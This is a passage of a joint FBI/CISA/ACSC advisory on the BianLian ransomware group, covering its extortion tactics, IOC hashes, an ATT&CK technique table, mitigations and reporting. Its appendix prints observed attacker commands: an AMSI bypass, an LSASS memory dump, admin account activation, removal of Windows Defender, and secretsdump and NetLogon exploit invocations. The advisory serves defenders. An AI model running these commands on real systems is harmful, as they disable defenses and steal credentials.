</tr></tbody></table><p>If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID <a>A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC</a>, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via <a>https://qtox.github[.]io</a> and includes an alternative contact email address (<a>swikipedia@onionmail[.]org</a> or <a>xxx@mail2tor[.]com</a>). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company.</p>
<p>BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.</p>
<h3>Indicators of Compromise (IOC)</h3>
<p>See Table 1 for IOCs obtained from FBI investigations as of March 2023.</p>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption>Table 1: BianLian Ransomware and Data Extortion Group IOCs</caption>
<thead><tr><td>
<p><em><strong>Name</strong></em></p>
</td>
<td>
<p><em><strong>SHA-256 Hash</strong></em></p>
</td>
<td>
<p><em><strong>Description</strong></em></p>
</td>
</tr></thead><tbody><tr><td>
<p><em><a>def.exe</a></em></p>
</td>
<td>
<p><em>7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893</em></p>
</td>
<td>
<p><em>Malware associated with BianLian intrusions, which is an example of a possible backdoor developed by BianLian group.</em></p>
</td>
</tr><tr><td>
<p><em><a>encryptor.exe</a></em></p>
</td>
<td>
<p><em>1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43</em></p>
</td>
<td>
<p><em>Example of a BianLian encryptor.</em></p>
</td>
</tr><tr><td>
<p><em><a>exp.exe</a></em></p>
</td>
<td>
<p><em>0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500</em></p>
</td>
<td>
<p><em>Possible NetLogon vulnerability (CVE-2020-1472) exploitation.</em></p>
</td>
</tr><tr><td>
<p><em><a>system.exe</a></em></p>
</td>
<td>
<p><em>40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce</em></p>
</td>
<td>
<p><em>Enumerates registry and files. Reads clipboard data.</em></p>
</td>
</tr></tbody></table><h4>MITRE ATT&amp;CK Techniques</h4>
<p>See Table 2 for all referenced threat actor tactics and techniques in this advisory.</p>
<table class="MsoTableGrid"><caption>Table 2: BianLian Group Actors ATT&amp;CK Techniques for Enterprise</caption>
<tbody><tr><th>
<p><em><strong>Technique Title</strong></em></p>
</th>
<th>
<p><em><strong>ID</strong></em></p>
</th>
<th>
<p><em><strong>Use</strong></em></p>
</th>
</tr><tr><th>
<h6>Resource Development</h6>
</th>
</tr><tr><td>
<p>Develop Capabilities: Malware</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1587/001/">T1587.001</a></p>
</td>
<td>
<p>BianLian group actors developed a custom backdoor used in their intrusions.</p>
</td>
</tr><tr><th>
<h6><em><strong>Initial Access</strong></em></h6>
</th>
</tr><tr><td>
<p>External Remote Services</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1133/">T1133</a></p>
</td>
<td>
<p>BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement.</p>
</td>
</tr><tr><td>
<p>Phishing</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1566/">T1566</a></p>
</td>
<td>
<p>BianLian group actors used phishing to obtain valid user credentials for initial access.</p>
</td>
</tr><tr><td>
<p>Valid Accounts</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1078/">T1078</a></p>
</td>
<td>
<p>BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement.</p>
</td>
</tr><tr><th>
<h6><em><strong>Execution</strong></em></h6>
</th>
</tr><tr><td>
<p>Command and Scripting Interpreter: PowerShell</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1059/001/">T1059.001</a></p>
</td>
<td>
<p>BianLian group actors used PowerShell to disable AMSI on Windows. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
</td>
</tr><tr><td>
<p>Command and Scripting Interpreter: Windows Command Shell</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1059/003/">T1059.003</a></p>
</td>
<td>
<p>BianLian group actors used Windows Command Shell to disable antivirus tools, for discovery, and to execute their tools on victim networks. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
</td>
</tr><tr><td>
<p>Scheduled Task/Job: Scheduled Task</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1053/005/">T1053.005</a></p>
</td>
<td>
<p>BianLian group actors used a Scheduled Task run as <a>SYSTEM</a> (the highest privilege Windows accounts) to execute a Dynamic Link Library (DLL) file daily. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
</td>
</tr><tr><th>
<h6><em><strong>Persistence</strong></em></h6>
</th>
</tr><tr><td>
<p>Account Manipulation</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1098/">T1098</a></p>
</td>
<td>
<p>BianLian group actors changed the password of an account they created.</p>
<p>BianLian actors modified the password of an account they added to the local <a>Remote Desktop Users</a> group.</p>
</td>
</tr><tr><td>
<p>Create Account: Local Account</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1136/001">T1136.001</a></p>
</td>
<td>
<p>BianLian group actors created/activated a local administrator account.</p>
<p>BianLian group actors used <a>net.exe</a> to add a user account to the local <a>Remote Desktop Users</a> group. (See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for more information.)</p>
</td>
</tr><tr><th>
<h6><em><strong>Defense Evasion</strong></em></h6>
</th>
</tr><tr><td>
<p>Modify Registry</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1112/">T1112</a></p>
</td>
<td>
<p>BianLian group actors modified the registry to  disable user authentication for RDP connections, allow a user to receive help from Remote Assistance, and disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services.</p>
</td>
</tr><tr><td>
<p>Impair Defenses: Disable or Modify Tools</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1562/001/">T1562.001</a></p>
</td>
<td>
<p>BianLian group actors disabled Windows defender, AMSI, and Sophos SAVEnabled and SEDEenabled tamper protection services. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
</td>
</tr><tr><td>
<p>Impair Defenses: Disable or Modify System Firewall</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1562/004/">T1562.004</a></p>
</td>
<td>
<p>BianLian group actors added modified firewalls to allow RDP traffic by adding new rules to the Windows firewall that allow incoming RDP traffic and enable a pre-existing Windows firewall rule group named <a>Remote Desktop</a>.</p>
</td>
</tr><tr><th>
<h6><em><strong>Credential Access</strong></em></h6>
</th>
</tr><tr><td>
<p>OS Credential Dumping: LSASS Memory</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1003/001/">T1003.001</a></p>
</td>
<td>
<p>BianLian group actors accessed credential material stored in the process memory of the LSASS. See Appendix: <a href="https://www.cisa.gov/#_APPENDIX_:_">Windows PowerShell and Command Shell Activity</a> for additional information.</p>
</td>
</tr><tr><td>
<p>OS Credential Dumping: NTDS</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1003/003/">T1003.003</a></p>
</td>
<td>
<p>BianLian group actors attempted to access or create a copy of the Active Directory domain database in order to steal credential information and to obtain other information about domain members such as devices, users, and access rights.</p>
</td>
</tr><tr><td>
<p>Unsecured Credentials: Credentials In Files</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1552/001/">T1552.001</a></p>
</td>
<td>
<p>BianLian group actors searched local file systems and remote file shares for files containing insecurely stored credentials.</p>
</td>
</tr><tr><th>
<h6><em><strong>Discovery</strong></em></h6>
</th>
</tr><tr><td>
<p>Account Discovery: Domain Account</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1087/002/">1087.002</a></p>
</td>
<td>
<p>BianLian group actors queried the domain controller to identify accounts in the <a>Domain Admins</a> and <a>Domain Computers</a> groups. This information can help adversaries determine which domain accounts exist to aid in follow-on activity.</p>
</td>
</tr><tr><td>
<p>Domain Trust Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1482/">T1482</a></p>
</td>
<td>
<p>BianLian group actors used PingCastle to enumerate the AD and map trust relationships.</p>
<p>BianLian group actors retrieved a list of domain trust relationships used to identify lateral movement opportunities in Windows multi-domain/forest environments.</p>
</td>
</tr><tr><td>
<p>File and Directory Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1083/">T1083</a></p>
</td>
<td>
<p>BianLian group used malware (<a>system.exe</a>) that enumerates files.</p>
</td>
</tr><tr><td>
<p>Network Service Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1046/">T1046</a></p>
</td>
<td>
<p>BianLian actors used Advanced Port Scanner and SoftPerfect Network Scanner to ping computers, scan ports, and identify program versions running on ports.</p>
</td>
</tr><tr><td>
<p>Network Share Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1135/">T1135</a></p>
</td>
<td>
<p>BianLian actors used SoftPerfect Network Scanner, which can discover shared folders.</p>
<p>BianLian group actors used SharpShares to enumerate accessible network shares in a domain.</p>
</td>
</tr><tr><td>
<p>Permission Groups Discovery: Domain Groups</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1069/002/">T1069.002</a></p>
</td>
<td>
<p>BianLian group actors queried the domain controller to identify groups.</p>
</td>
</tr><tr><td>
<p>Query Registry</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1012/">T1012</a></p>
</td>
<td>
<p>BianLian group used malware (<a>system.exe</a>) that enumerates registry.</p>
</td>
</tr><tr><td>
<p>Remote System Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1018/">T1018</a></p>
</td>
<td>
<p>BianLian group actors attempted to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement.</p>
<p>BianLian group actors retrieved a list of domain controllers.</p>
</td>
</tr><tr><td>
<p>System Owner User Discovery</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1033/">T1033</a></p>
</td>
<td>
<p>BianLian group actors queried currently logged-in users on a machine.</p>
</td>
</tr><tr><th>
<h6><em><strong>Lateral Movement</strong></em></h6>
</th>
</tr><tr><td>
<p>Remote Services: Remote Desktop Protocol</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1021/001/">T1021.001</a></p>
</td>
<td>
<p>BianLian group actors used RDP with valid accounts for lateral movement.</p>
</td>
</tr><tr><th>
<h6><em><strong>Collection</strong></em></h6>
</th>
</tr><tr><td>
<p>Clipboard Data</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1115/">T1115</a></p>
</td>
<td>
<p>BianLian group actors’ malware collects data stored in the clipboard from users copying information within or between applications.</p>
</td>
</tr><tr><th>
<h6><em><strong>Command and Control</strong></em></h6>
</th>
</tr><tr><td>
<p>Ingress Tool Transfer</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1105/">T1105</a></p>
</td>
<td>
<p>BianLian group actors transferred tools or other files from an external system into a compromised environment.</p>
</td>
</tr><tr><td>
<p>Remote Access Software</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1219/">T1219</a></p>
</td>
<td>
<p>BianLian group actors used legitimate desktop support and remote access software, such as TeamViewer, Atera, and SplashTop, to establish an interactive command and control channel to target systems within networks.</p>
</td>
</tr><tr><th>
<h6><em><strong>Exfiltration</strong></em></h6>
</th>
</tr><tr><td>
<p>Transfer Data to Cloud Account</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1537/">T1537</a></p>
</td>
<td>
<p>BianLian group actors used Rclone to exfiltrate data to a cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.</p>
</td>
</tr><tr><td>
<p>Exfiltration Over Alternative Protocol</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1048/">T1048</a></p>
</td>
<td>
<p>BianLian group actors exfiltrated data via FTP.</p>
</td>
</tr><tr><td>
<p>Exfiltration Over Web Service: Exfiltration to Cloud Storage</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1567/002/">T1567.002</a></p>
</td>
<td>
<p>BianLian group actors exfiltrated data via Mega public file-sharing service.</p>
</td>
</tr><tr><th>
<h6><em><strong>Impact</strong></em></h6>
</th>
</tr><tr><td>
<p>Data Encrypted for Impact</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1486/">T1486</a></p>
</td>
<td>
<p>BianLian group actors encrypted data on target systems.</p>
</td>
</tr></tbody></table><h3>Mitigations</h3>
<p>FBI, CISA, and ACSC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cpg" target="_blank" title="https://www.cisa.gov/cpg">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul><li>Reduce threat of malicious actors using remote access tools by:
<ul><li><strong>Auditing remote access tools</strong> on your network to identify currently used and/or authorized software.</li>
<li><strong>Reviewing logs for execution of remote access software </strong>to detect abnormal use of programs running as a portable executable [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.T</a>].</li>
<li><strong>Using security software to detect instances of remote access</strong> software only being loaded in memory.</li>
<li><strong>Requiring authorized remote access solutions only be used from within your network over approved remote access solutions</strong>, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).</li>
<li><strong>Blocking both inbound and outbound connections on common remote access software ports and protocols </strong>at the network perimeter.</li>
</ul></li>
<li><strong>Implement application controls to manage and control execution of software</strong>, including allowlisting remote access programs.
<ul><li>Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
</ul></li>
</ul><p>See NSA Cybersecurity Information sheet <a href="https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf">Enforce Signed Software Execution Policies</a> for additional guidance.</p>
<ul><li><strong>Strictly limit the use of RDP and other remote desktop services</strong>. If RDP is necessary, rigorously apply best practices, for example [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.W</a>]:
<ul><li>Audit the network for systems using RDP.</li>
<li>Close unused RDP ports.</li>
<li>Enforce account lockouts after a specified number of attempts.</li>
<li>Apply <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf">phishing-resistant multifactor authentication (MFA)</a>.</li>
<li>Log RDP login attempts.</li>
</ul></li>
<li><strong>Disable command-line and scripting activities and permissions </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.N</a>]<strong>.</strong></li>
<li><strong>Restrict the use of PowerShell</strong>, using Group Policy, and only grant to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.E</a>].</li>
<li><strong>Update Windows PowerShell or PowerShell Core</strong> to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 1.E, 2.S, 2.T</a>].</li>
<li><strong>Enable enhanced PowerShell logging </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.T, 2.U</a>].
<ul><li>PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.</li>
<li>Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).</li>
<li>The two logs that record PowerShell activity are the <a>PowerShell</a> Windows Event Log and the <a>PowerShell Operational</a> Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.</li>
</ul></li>
<li><strong>Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations</strong> requiring administrator privileges to reduce the risk of lateral movement by PsExec.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 4.C</a>].</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.E</a>].</li>
<li>Reduce the threat of credential compromise via the following<strong>:</strong>
<ul><li><strong>Place domain admin accounts in the protected users’ group</strong> to prevent caching of password hashes locally.</li>
<li><strong>Implement Credential Guard for Windows 10 and Server 2016</strong> (Refer to <a href="https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage" title="Manage Windows Defender Credential Guard">Microsoft: Manage Windows Defender Credential Guard</a> for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).</li>
<li><strong>Refrain from storing plaintext credentials in scripts</strong>.</li>
</ul></li>
<li><strong>Implement time-based access for accounts set at the admin level and higher </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.A, 2.E</a>]<strong>.</strong> For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory (AD) level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
</ul><p>In addition, FBI, CISA, and ACSC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:</p>
<ul><li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they will not be as severe and/or only have irretrievable data [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.R</a>]. ACSC recommends organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media such as disk and tape, with one copy kept off-site for disaster recovery.</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) <strong>to comply</strong> with <a href="https://pages.nist.gov/800-63-3/">National Institute for Standards and Technology (NIST) standards</a> for developing and managing password policies.
<ul><li>Use longer passwords consisting of at least 15 characters [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.B</a>].</li>
<li>Store passwords in hashed format using industry-recognized password managers.</li>
<li>Add password user “salts” to shared login credentials.</li>
<li>Avoid reusing passwords [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.C</a>].</li>
<li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.G</a>].</li>
<li>Disable password “hints”.</li>
<li>Refrain from requiring password changes more frequently than once per year.<br><strong>Note:</strong> NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
<li>Require administrator credentials to install software.</li>
</ul></li>
<li><strong>Require phishing-resistant multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.H</a>].</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours from vulnerability disclosure. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 1.E</a>].</li>
<li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks, restricting further lateral movement [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.F</a>].</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 3.A</a>].</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
<li><strong>Disable unused</strong> <strong>ports </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.V</a>]<strong>.</strong></li>
<li><strong>Consider adding an email banner to emails</strong> received from outside your organization [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.M</a>].</li>
<li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf">CPG 2.K, 2.L, 2.R</a>].</li>
</ul><h4>Validate Security Controls</h4>
<p>In addition to applying mitigations, FBI, CISA, and ACSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. FBI, CISA, and ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol><li>Select an ATT&amp;CK technique described in this advisory (see Table 2).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol><p>FBI, CISA, and ACSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3>RESOURCES</h3>
<ul><li><a href="https://www.stopransomware.gov/">Stopransomware.gov</a>, a whole-of-government approach with one central location for U.S. ransomware resources and alerts.</li>
<li><a href="https://www.cyber.gov.au/">cyber.gov.au</a> for the Australian Government’s central location to report cyber incidents, including ransomware, and to see advice and alerts. The site also provides ransomware advisories for businesses and organizations to help mitigate cyber threats.</li>
<li><a href="https://www.cisa.gov/sites/default/files/2023-01/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf">CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide</a> for guidance on mitigating and responding to a ransomware attack</li>
<li>For no-cost cyber hygiene services for U.S. organizations,  <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a>.</li>
</ul><h3>Reporting</h3>
<p>The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with BianLian actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a> or CISA at <a href="https://us-cert.cisa.gov/report">cisa.gov/report</a>. Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ACSC via 1300 CYBER1 (1300 292 371) or by submitting a report <a href="https://www.cyber.gov.au/report-and-recover/report">cyber.gov.au</a>.</p>
<h3>Acknowledgements</h3>
<p>Microsoft and Sophos contributed to this advisory.</p>
<h2>APPENDIX: WINDOWS PowerSHell and COMMAND SHELL ACTIVITY</h2>
<p>Through FBI investigations as of March 2023, FBI has observed BianLian actors use the commands in Table 3. ACSC has observed BianLian actors use some of the same commands.</p>
<table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption>Table 3: PowerShell and Windows Command Shell Activity</caption>
<thead><tr><td>
<p><em><strong>Command</strong></em></p>
</td>
<td>
<p><em><strong>Use</strong></em></p>
</td>
</tr></thead><tbody><tr><td>
<p>[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,* Static’).SetValue($null,$true) </p>
</td>
<td>
<p>Disables the AMSI on Windows. AMSI is a built-in feature on Windows 10 and newer that provides an interface for anti-malware scanners to inspect scripts prior to execution. When AMSI is disabled, malicious scripts may bypass antivirus solutions and execute undetected.</p>
</td>
</tr><tr><td>
<p>cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full</file></p>
</td>
<td>
<p>Creates a memory dump <a>lsass.exe</a> process and saves it as a CSV file<a href="https://attack.mitre.org/versions/v12/techniques/T1003/001/">https://attack.mitre.org/versions/v12/techniques/T1003/001/</a>.  BianLian actors used it to harvest credentials from <a>lsass.exe</a>.</p>
</td>
</tr><tr><td>
<p>cmd.exe /Q /c net user <admin> /active:yes 1&gt; \\127.0.0.1\C$\Windows\Temp\<folder> 2&gt;&amp;1</folder></admin></p>
</td>
<td>
<p>Activates the local Administrator account.</p>
</td>
</tr><tr><td>
<p>cmd.exe /Q /c net user "<admin>"<password> 1&gt; \\127.0.0.1\C$\Windows\Temp\<folder> 2&gt;&amp;1</folder></password></admin></p>
</td>
<td>
<p>Changes the password of the newly activated local Administrator account.</p>
</td>
</tr><tr><td>
<p>cmd.exe /Q /c quser 1&gt; \\127.0.0.1\C$\Windows\Temp\<folder> 2&gt;&amp;1</folder></p>
</td>
<td>
<p>Executes <a>quser.exe</a> to query the currently logged-in users on a machine. The command is provided arguments to run quietly and exit upon completion, and the output is directed to the <a>\Windows\Temp</a> directory.</p>
</td>
</tr><tr><td>
<p>dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart</p>
</td>
<td>
<p>Using the Deployment Image Servicing and Management (DISM) executable file, removes the Windows Defender feature.</p>
</td>
</tr><tr><td>
<p>dump.exe -no-pass -just-dc user.local/<fileserver.local>\@<local_ip></local_ip></fileserver.local></p>
</td>
<td>
<p>Executes <a>secretsdump.py</a>, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers.</p>
</td>
</tr><tr><td>
<p>exp.exe -n <fileserver.local> -t <local_ip></local_ip></fileserver.local></p>
</td>
<td>
<p>Possibly attempted exploitation of the NetLogon vulnerability (CVE-2020-1472).</p>
</td>
</tr><tr><td>
<p>findstr /spin "password" *.* &gt;C:\Users\training\Music\<file>.txt</file></p>
</td>
<td>
<p>Searches for the string <a>password</a> in all files in the current directory and its subdirectories and puts the output to a file.</p>
</td>
</tr><tr><td>
<p>ldap.exe -u user\<user> -p <password> ldap://<local_ip></local_ip></password></user></p>
</td>
<td>
<p>Connects to the organization’s Lightweight Directory Access Protocol (LDAP) server.</p>
</td>
</tr><tr><td>
<p>logoff</p>
</td>
<td>
<p>Logs off the current user from a Windows session. Can be used to log off multiple users at once.</p>
